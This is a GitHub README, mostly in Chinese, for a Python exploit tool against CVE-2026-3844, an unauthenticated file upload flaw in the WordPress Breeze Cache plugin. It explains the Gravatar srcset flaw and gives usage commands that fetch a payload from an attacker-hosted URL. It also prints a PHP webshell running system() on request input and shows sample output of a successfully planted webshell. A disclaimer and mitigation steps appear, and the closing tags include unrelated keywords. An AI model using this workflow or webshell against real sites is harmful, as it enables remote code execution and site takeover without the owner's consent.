0xgh057r3c0n/CVE-2026-3844

GitHub: 0xgh057r3c0n/CVE-2026-3844

针对 WordPress Breeze Cache 插件未授权任意文件上传漏洞(CVE-2026-3844)的检测与利用工具。

Stars: 0 | Forks: 0

WordPress Logo

CVE-2026-3844

Breeze Cache ≤ 2.4.4 - Unauthenticated Arbitrary File Upload

[![MIT 许可证](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) [![Python 3.6+](https://img.shields.io/badge/Python-3.6+-blue.svg)](https://www.python.org/) [![WordPress](https://img.shields.io/badge/WordPress-%3C%3D6.x-blue?logo=wordpress)](https://wordpress.org/)
## ⚠️ 免责声明 ``` THIS TOOL IS PROVIDED FOR EDUCATIONAL AND SECURITY RESEARCH PURPOSES ONLY. Unauthorized access to computer systems is illegal. Use this tool only on systems you own or have explicit permission to test. The author assumes no liability for any misuse or damage caused by this software. ``` ## 📋 描述 CVE-2026-3844 是 WordPress 的 **Breeze Cache** 插件(版本 ≤ 2.4.4)中存在的一个严重的未经身份验证的任意文件上传漏洞。该插件未能正确验证评论中的 `srcset` 参数,允许远程攻击者向服务器上传恶意文件(包括 webshell)。 ### 🔴 严重性 - **CVSS 评分**: 9.8 (严重) - **攻击向量**: 网络 - **需要身份验证**: 否 - **影响**: 远程代码执行 (RCE) ## 🎯 受影响版本 - Breeze Cache **≤ 2.4.4** - WordPress **所有版本** (依赖于插件) ## 🔧 技术细节 该漏洞利用了 Breeze 中的 Gravatar 缓存功能。当发布带有特殊构造的 `srcset` 参数(包含远程文件 URL)的评论时,Breeze 会下载该文件并将其本地存储在: ``` /wp-content/cache/breeze-extra/gravatars/[random_marker][file_extension] ``` **前置条件**: 必须在 Breeze 设置中启用 "Host Files Locally - Gravatars" 选项。 ## 🚀 安装 ``` # Clone repository git clone https://github.com/0xgh057r3c0n/CVE-2026-3844.git cd CVE-2026-3844 # Install dependencies pip install pycurl termcolor ``` ## 💻 使用方法 ### 基本用法 ``` python3 CVE-2026-3844.py -u http://target.com ``` ### 高级选项 ``` # Check if target is vulnerable without exploitation python3 CVE-2026-3844.py -u http://target.com --check-only # Use custom payload URL python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/payload.php # Save output to file python3 CVE-2026-3844.py -u http://target.com -o shells.txt # Increase timeout for slow targets python3 CVE-2026-3844.py -u http://target.com --timeout 30 ``` ### 命令行参数 | 参数 | 描述 | |----------|-------------| | `-u, --url` | 目标 URL (必填) | | `-p, --payload` | 远程 payload URL | | `--timeout` | 请求超时时间(秒,默认值: 15) | | `--check-only` | 仅检查目标是否存在漏洞 | | `-o, --output` | 将 shell URL 保存到文件 | ## 📝 自定义 Payload 示例 创建你自己的 webshell (`shell.php`): ``` "; system($_REQUEST['cmd']); echo ""; } ?> ``` 将其托管在可访问的地方,然后使用: ``` python3 CVE-2026-3844.py -u http://target.com -p http://your-server.com/shell.php ``` ## 🔍 验证字符串 该 exploit 会自动检查上传文件中的验证字符串 `4356452d323032362d33383434`("CVE-2026-3844" 的十六进制编码),以确认利用成功。 ## 🛡️ 缓解措施 1. 将 **Breeze Cache** 更新到 **2.4.5 或更高版本** 2. 如果不需要,请禁用 "Host Files Locally - Gravatars" 3. 实施 Web 应用程序防火墙 (WAF) 规则 4. 定期审计评论功能 ## 📸 截图 ``` [*] PHASE 1: VULNERABILITY ASSESSMENT [*] Checking Breeze plugin version... [+] Target VULNERABLE (Breeze v2.4.4) [*] PHASE 2: EXPLOITATION [!] REQUIREMENT: 'Host Files Locally - Gravatars' MUST BE ENABLED [*] Step 1: Sending malicious comment... [+] Comment posted successfully [*] Step 2: Waiting for Breeze to cache the file... [*] Step 3: Checking for uploaded file... [+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php [+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL! [✓] STATUS: SUCCESS [✓] WEBSHELL URL: http://target.com/wp-content/cache/breeze-extra/gravatars/x7k3m9p2.php ``` ## 📁 目录结构 ``` CVE-2026-3844/ ├── CVE-2026-3844.py # Main exploit script ├── README.md # This file └── LICENSE # MIT License ``` ## 📄 许可证 本项目采用 MIT 许可证授权 - 有关详细信息,请参阅 [LICENSE](LICENSE) 文件。 ## 🙏 致谢 - **作者**: 0xgh057r3c0n - **发现者**: 安全研究团队 - **CVE ID**: CVE-2026-3844 ## 📞 联系方式 - GitHub: [@0xgh057r3c0n](https://github.com/0xgh057r3c0n) - 报告问题: [GitHub Issues](https://github.com/0xgh057r3c0n/CVE-2026-3844/issues) ## ⭐ 支持 如果你觉得这个工具有用,请在 GitHub 上给它一个星标 ⭐!
使用 🐍 Python 构建 | 仅供教育目的
标签:0day漏洞, Breeze Cache插件, CISA项目, CVE-2026-3844, CVSS 9.8, Gravatar缓存缺陷, OpenVAS, PHP, POC利用, Python安全工具, Webshell, Web安全, WordPress漏洞, 任意文件上传, 提示词注入, 未授权攻击, 编程工具, 蓝队分析, 远程代码执行, 逆向工具, 高危漏洞